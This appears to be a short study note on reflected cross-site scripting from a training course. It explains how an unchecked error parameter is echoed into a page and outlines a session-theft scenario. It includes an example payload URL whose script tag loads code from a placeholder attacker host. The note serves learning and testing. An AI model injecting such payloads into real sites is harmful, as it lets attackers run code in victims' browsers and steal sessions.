Reflected xss happens when user-supplied data in an HTTP request is included in the webpage source without any validation, e.g.
A website where if you enter incorrect input, an error message is displayed. The content of the error message gets taken from the error
parameter in the query string.
https://website.thm/?error=Invalid input Detected
If the application doesn't check the contents of the error parameters, we could insert malicious code:
https://website.thm/?error=<script src="https://attacker.thm/evil.js'></script>
This would get rendered as
<div class-"alert alert-danger">
<p>
<script src="https://attacker.thm/evil.js"></script>
</p>
</div>
Example scenario
- Attacker sends a link with malicious payload to a victim
- Victim clicks the link and is taken to a vulnerable site
- Link containing attacker's script is executed on website
- The gathered data (e.g. stolen session) is sent back to the attacker
The attacker could send links or embed them into an iframe
to execute code on the victim browser, potentially revealing sensitive information.
How to test for Reflected XSS
Manually test every possible point of entry, including:
- Parameters in the URL Query String
- URL File Path
- Sometimes HTTP Headers (although unlikely exploitable in practice)
Once you've found some data which is being reflected in the web application, you'll then need to confirm that you can successfully run your JavaScript payload; your payload will be dependent on where in the application your code is reflected.